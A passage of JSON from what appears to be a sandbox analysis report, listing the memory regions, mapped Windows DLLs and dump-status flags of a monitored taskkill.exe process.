"version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2184", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:21.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2185", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:21.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_2186", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:21.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_2187", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:21.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_2188", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:21.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1900543, "entry_point": 0, "filename": null, "id": "region_2189", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:01:21.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 2228223, "entry_point": 0, "filename": null, "id": "region_2190", "name": "private_0x00000000001e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1966080, "timestamp": "00:01:21.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 12255232, "type": "region", "version": 1 }, "end_va": 12345343, "entry_point": 12278921, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_2191", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 12255232, "timestamp": "00:01:21.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_2192", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:21.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_2193", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:21.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_2194", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:21.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_2195", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:21.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_2196", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:21.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_2197", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:21.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2198", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:21.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_2199", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:21.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_2200", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:21.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_2201", "name": "private_0x0000000000340000", "norm_filename": null, "region_type": "private_memory", "start_va": 3407872, "timestamp": "00:01:21.025", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_2202", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:21.025", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_2203", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:21.025", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_2204", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:21.026", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_2205", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:21.026", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_2206", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:21.026", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_2207", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:21.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2208", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:21.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_2209", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:01:21.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5111808, "type": "region", "version": 1 }, "end_va": 6160383, "entry_point": 0, "filename": null, "id": "region_2210", "name": "private_0x00000000004e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5111808, "timestamp": "00:01:21.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 7667712, "type": "region", "version": 1 }, "end_va": 7733247, "entry_point": 0, "filename": null, "id": "region_2211", "name": "private_0x0000000000750000", "norm_filename": null, "region_type": "private_memory", "start_va": 7667712, "timestamp": "00:01:21.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1787428864, "type": "region", "version": 1 }, "end_va": 1788391423, "entry_point": 1787433934, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_2212", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1787428864, "timestamp": "00:01:21.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1788411904, "type": "region", "version": 1 }, "end_va": 1788473343, "entry_point": 1788416673, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_2213", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1788411904, "timestamp": "00:01:21.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1788477440, "type": "region", "version": 1 }, "end_va": 1788514303, "entry_point": 1788482982, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_2214", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1788477440, "timestamp": "00:01:21.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1788542976, "type": "region", "version": 1 }, "end_va": 1788612607, "entry_point": 1788547840, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_2215", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1788542976, "timestamp": "00:01:21.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1788674048, "type": "region", "version": 1 }, "end_va": 1788891135, "entry_point": 1788679125, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_2216", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1788674048, "timestamp": "00:01:21.051", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_2217", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:21.051", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944309759, "entry_point": 1944261088, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_2218", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:21.052", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_2219", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:21.052", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_2220", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:21.052", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_2221", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:21.053", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_2222", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:21.053", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_2223", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:21.054", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_2224", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:21.054", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_2225", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:21.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_2226", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:21.057", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_2227", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:21.057", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_2228", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:21.058", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_2229", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:21.058", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_2230", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:21.059", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_2231", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:21.059", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_2232", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:21.059", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_2233", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:21.060", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_2234", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:21.060", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_2235", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:21.061", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_2236", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:21.061", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_2237", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:21.062", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_2238", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:21.062", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_2239", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:21.062", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2240", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:21.063", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 7733248, "type": "region", "version": 1 }, "end_va": 9338879, "entry_point": 0, "filename": null, "id": "region_2241", "name": "pagefile_0x0000000000760000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7733248, "timestamp": "00:01:21.071", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2242", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:21.071", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_2243", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:21.072", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 